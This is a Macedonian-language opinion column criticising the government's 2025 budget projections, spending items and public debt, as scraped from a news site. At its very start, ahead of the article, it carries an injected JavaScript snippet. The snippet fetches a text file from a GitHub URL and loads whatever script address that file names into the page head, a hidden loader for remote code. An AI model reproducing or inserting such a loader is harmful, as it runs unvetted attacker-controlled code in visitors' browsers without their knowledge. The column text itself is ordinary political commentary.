;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Димитриев: Буџет на стагнација, празни ветувања и непродуктивни трошоци - Антропол
Став

Димитриев: Буџет на стагнација, празни ветувања и непродуктивни трошоци

Колумна на Марјан Димитриев, координатор на сектор Финансии при Политичката Парија Левица.

Секој нов предлог буџет треба да претставува шанса за подобра иднина односно план кој ќе ги обликува клучните аспекти на економијата, ќе го поддржи растот и ќе го подобри животот на граѓаните.  Но, кога пред нас се наоѓа докумет кој не успева да поттикне економски развој тоа што ни останува е да сме сведоци на уште една пропуштена можност.

Проекцијата на макроекономските движења е клучна варијабла во поставувањето и проектирањето на фискалната политика која што пак влијае врз реалниот БДП, инфлацијата, економската активност, конкурентноста и ефикасноста на економијата. Министерството за финансии растот на БДП за наредната година го проектира амбициозно на 3,7% што е многу поголемо предвидувања во ондос на Светска банка која пак излезе со проекција од 2,5% економски раст. Проектиранта стапка останува под притисок од неизвесностите во економското окружување, главно од ревидираните очекувања за пониски остварувања во економиите на главните трговски партнери посебно на германската економија.

Оптималниот модел за раст на мала и отворена економија како нашата од страна на економската наука е растот да се базира на нето извозот, податоците покажуваат дека надворешно трговската размена учествува со 160% од БДП на Македонија. Но, со предлог буџетот за 2025 година може да се увиди дека МФ како клучен двигател на растот очекува  да биде домашната потрошувачка каде што се вклучени личната потрошувачка, инвестиционата и јавната потрошувачка. Ваквиот модел на раст не е во согласност со моделот на раст презентиран во Националната развојна стратегија.

Во однос на приходната страна, Министерството за финансии предвидува зголемување од 12,8% што е повеќе од двојно повисоко од збирот на стапката на раст на БДП и инфлацијата. Ова е оптимистичко и нереално сценарио со оглед на тоа што даночните стапки остануваат на исто ниво. Можна претпоставка како ова сценарио може да се оствари е преку зголемување на неданочните приходи во буџетот односно зголемување на ставките казни и глоби (во Буџетот оваа ставка е зголемна за 21% во однос на минатата година) за компаниите и граѓаните во услови кога Владата нема акциски план како да се справи со сивата економија.

Во Буџетот за следната година расходната страна бележи раст од 10,3% а структурата на трошоците останува проблематична. Оваа Влада очигледно планира да ги троши парите на граѓаните за патни и дневни трошоци па така оваа ставка е зголемена за 59% и изнесува 14,6 милиони евра. Во ситуација кога наредната година е изборна година, Владата ставката за привремени вработувања ја зголемува повеќе од двојно и изнесува 5 милиони евра. Оваа Влада не планира да штеди ниту на трансферите кон невладините организации па така за наредната година само кон невладини организации би потрошиле 26,5 милиони евра. Во Министерството за Правда оваа ставка опфаќа 67% или 9 милиони евра од вкупниот буџет на ова министерство (13,4 милиони евра), а додека за потпрограмата за борба против корупцијата и организиран криминал има одвоено само 450 илјади денари или 7,300 евра. Од ова јасно може да ја видат граѓаните намерата на Владата што е нивниот приоритет. Ставката разни трансфери која што е сомнителна за испунпување пари од буџетот за наредна година е зголемена и изнесува неверојатни 426 милиони евра.

Капиталните инвестиции за наредната година се проектирани на 821 милиони евра и овде има доста нелогичности. Ставка купување на мебел е зголемена за 600% и изнесува 2,5 милиони евра. Во однос на ставка купување на возила има зголемување за 540% и изнесува 7,5 милиони евра. Само во Министерството за животна средина и просторно планирање или кај првиот вице премиер Меџити кој што буџетот на своето министерство си го има зголемено од 23,3 милиони евра на 86,1 милиони евра (читај паралелна влада) за оваа ставка има 2,2 милиони евра, додека кај агенцијата за финансика поддршка во земјоделството и руралниот развој за финансиска поддршка на руралниот развој средствата се намалени од 16 милиони евра на 2,5 милиони евра.

Колку е „развоен“ овој буџет покажува и фактот што Владата за изградба и реконструкција на згради на владини органи си одвоила 4,2 милиони евра а за изградба на нов клинички центар во Скопје со 25 клиники и реконструкција на клиничкиот центар во Штип се одвоени 1,8 милиони евра. За амбуланти во руралните подрачја Министерството за здравство има одвоено 500 илјади денари или 8,130 евра. Но затоа буџетот за НАТО за наредната години изнесува 107,5 милиони евра. Во однос на гасификацијата за која што Владата тврди дека е битна и потребна работа, за наредна година има одвоено само 1,7 милиони евра небаре ќе ги гасифицира само домовите на своите пратеници и министри.

Дволичноста на Владата се гледа кога едно збори во опозиција а друго прави кога е на власт. За нај корумпираниот договор во историјата на Македонија (ова се зборови на премиерот и министерот за транспорт) наместо ревизија и објавување на договорот со Бектел и Енка тие продолжуваат со исто темпо како нивните претходници и за наредната година се одвоени нови 130 милиони евра.

Збор два и за задолжувањата и јавниот долг кој според проекциите до крајот на годината вкупниот јавен долг ќе изнесува 62,7% од БДП. Меѓутоа, доколку се земат предвид и доспеаните а неисплатени обврски на јавните претпријатија и АД во државна сопственост кои што заклучно со првата половина на 2024 година изнесуваат 700 милиони евра, тој може да надмине 70% од БДП. Во извештајот на ЕК за напредокот на Македонија и во извештајот на Фискалниот совет за фискалната стратегија дадени се препораки овие средства да бидат пресметувани во вкупниот јавен долг. Фискалниот совет оди чекор напред со давање на препораки за кривично санкционирање на носителите на јавни функции кои нема да се придржуваат до фискалните правила и направат дополнителен јавен долг нешто што Левица го има во својата изборна програма.

Само во 2025 година по основ на камата државата ќе треба да плати 336 милиони евра кон домашни и странски кредитори. Ова е загрижувачко и неодржливо ниво и бара итни мерки за посериозна консолидација на јавниот долг. За долгорочно решавање на проблемот со јавниот долг е потребно структурно преуредување и на страната на трошоците и на страната на приходите.